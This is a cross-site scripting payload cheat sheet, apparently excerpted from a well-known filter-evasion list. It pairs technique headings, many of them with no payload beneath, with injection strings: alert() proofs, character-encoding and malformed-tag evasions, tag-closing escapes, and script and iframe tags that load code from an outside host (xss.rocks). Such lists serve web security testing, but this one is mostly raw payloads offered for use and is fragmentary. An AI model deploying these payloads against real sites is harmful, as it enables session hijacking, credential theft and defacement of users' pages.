<img src=x onerror="alert('xss')">
<script>alert(1)</script>

https://github.com/payloadbox/xss-payload-list <--- Hundered billion payloads

Basic XSS Test Without Filter Evasion

XSS Locator (Polygot)

Image XSS Using the JavaScript Directive

No Quotes and no Semicolon

Case Insensitive XSS Attack Vector

HTML Entities

Grave Accent Obfuscation
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Malformed A Tags


Malformed IMG Tags
fromCharCode
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


Default SRC Tag to Get Past Filters that Check SRC Domain

Default SRC Tag by Leaving it Empty

Default SRC Tag by Leaving it out Entirely

On Error Alert

IMG onerror and JavaScript Alert Encode
Decimal HTML Character References

Decimal HTML Character References Without Trailing Semicolons

Hexadecimal HTML Character References Without Trailing Semicolons
Embedded Tab

Embedded Encoded Tab

Embedded Newline to Break-up XSS

Embedded Carriage Return to Break-up XSS

Null breaks up JavaScript Directive

Spaces and Meta Chars Before the JavaScript in Images for XSS

Non-alpha-non-digit XSS
  • <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>


Extraneous Open Brackets
  • <<SCRIPT>alert("XSS");//\<</SCRIPT>


No Closing Script Tags
  • <SCRIPT SRC=http://xss.rocks/xss.js?< B >


Protocol Resolution in Script Tags
  • <SCRIPT SRC=//xss.rocks/.j>


Half Open HTML/JavaScript XSS Vector
  • <IMG SRC="`('XSS')"`


Double Open Angle Brackets
  • <iframe src=http://xss.rocks/scriptlet.html <


Escaping JavaScript Escapes
  • \";alert('XSS');//
  • </script><script>alert('XSS');</script>


End Title Tag
  • </TITLE><SCRIPT>alert("XSS");</SCRIPT>